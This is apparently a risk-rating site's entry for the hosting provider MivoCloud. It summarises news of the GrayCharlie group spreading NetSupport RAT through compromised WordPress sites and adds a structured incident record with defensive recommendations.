MivoCloud: GrayCharlie Campaign Compromises WordPress Sites To Spread NetSupport RAT and Steal Data

GrayCharlie Cybercrime Group Exploits WordPress Sites to Deploy NetSupport RAT

Since mid-2023, the cybercriminal group GrayCharlie has been compromising WordPress sites to distribute the NetSupport RAT (Remote Access Trojan), enabling data theft and financial fraud. The group employs sophisticated social engineering tactics, including fake browser update prompts and ClickFix pop-ups, to trick users into downloading malicious payloads.

Once executed, the malware such as Stealer and SectopRAT installs NetSupport RAT, granting attackers full system access. This allows them to monitor activity, harvest credentials, and exfiltrate sensitive data. GrayCharlie’s infrastructure, primarily hosted by MivoCloud and HZ Hosting Ltd, includes command-and-control (C2) servers and staging systems for deploying additional malware.

A particularly alarming aspect of the campaign is its ability to bypass multi-factor authentication (MFA). By luring victims into entering credentials on fake but legitimate-looking login pages, attackers capture session cookies and authentication tokens, effectively neutralizing MFA protections.

GrayCharlie employs two primary attack chains:

• Fake Browser Update Chain: Compromised sites display deceptive update prompts, leading users to download and execute malicious payloads.
• ClickFix Chain: Victims are tricked into running malicious commands via Windows Run dialog, leveraging social engineering to initiate infections.

After installation, the malware establishes persistence through registry modifications, ensuring it runs at system startup. It then connects to C2 servers, enabling remote control and data exfiltration.

Recent attacks have targeted industries like legal services, with ongoing activity observed into 2025. Security researchers, including Insikt Group and Recorded Future, have identified multiple malicious domains and IP addresses linked to the campaign, urging organizations to block known indicators of compromise (IOCs) and deploy updated detection rules (e.g., YARA, Snort, Sigma) to mitigate risks.

Source: https://cyberpress.org/graycharlie-spreads-netsupport-rat/

MivoCloud TPRM report: https://www.rankiteo.com/company/mivocloud

"id": "miv1771961142",
"linkid": "mivocloud",
"type": "Cyber Attack",
"date": "1/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"

{'affected_entities': [{'industry': ['Legal Services'],
                        'type': 'WordPress Sites'}],
 'attack_vector': ['Compromised WordPress Sites',
                   'Social Engineering',
                   'Fake Browser Update Prompts',
                   'ClickFix Pop-ups'],
 'data_breach': {'data_exfiltration': True,
                 'personally_identifiable_information': True,
                 'sensitivity_of_data': 'High',
                 'type_of_data_compromised': ['Credentials',
                                              'Sensitive Data',
                                              'Session Cookies',
                                              'Authentication Tokens']},
 'date_detected': '2023-06-01',
 'description': 'Since mid-2023, the cybercriminal group GrayCharlie has been '
                'compromising WordPress sites to distribute the NetSupport RAT '
                '(Remote Access Trojan), enabling data theft and financial '
                'fraud. The group employs sophisticated social engineering '
                'tactics, including fake browser update prompts and ClickFix '
                'pop-ups, to trick users into downloading malicious payloads. '
                'Once executed, the malware installs NetSupport RAT, granting '
                'attackers full system access to monitor activity, harvest '
                'credentials, and exfiltrate sensitive data. The campaign can '
                'bypass multi-factor authentication (MFA) by capturing session '
                'cookies and authentication tokens.',
 'impact': {'data_compromised': ['Credentials',
                                 'Sensitive Data',
                                 'Session Cookies',
                                 'Authentication Tokens'],
            'identity_theft_risk': 'High',
            'operational_impact': 'Remote Control of Infected Systems',
            'systems_affected': ['User Systems Infected with NetSupport RAT']},
 'initial_access_broker': {'backdoors_established': ['NetSupport RAT'],
                           'entry_point': ['Fake Browser Update Prompts',
                                           'ClickFix Pop-ups']},
 'investigation_status': 'Ongoing',
 'motivation': ['Financial Gain', 'Data Theft'],
 'post_incident_analysis': {'corrective_actions': ['Blocking Known IOCs',
                                                   'Deploying Updated '
                                                   'Detection Rules'],
                            'root_causes': ['Compromised WordPress Sites',
                                            'Social Engineering Tactics']},
 'recommendations': ['Block known IOCs',
                     'Deploy updated detection rules (YARA, Snort, Sigma)',
                     'Enhance MFA protections to prevent session cookie theft'],
 'references': [{'source': 'Insikt Group (Recorded Future)'}],
 'response': {'enhanced_monitoring': ['Blocking Known IOCs',
                                      'Deploying Updated Detection Rules '
                                      '(YARA, Snort, Sigma)']},
 'threat_actor': 'GrayCharlie',
 'title': 'GrayCharlie Cybercrime Group Exploits WordPress Sites to Deploy '
          'NetSupport RAT',
 'type': ['Malware Distribution', 'Data Theft', 'Financial Fraud']}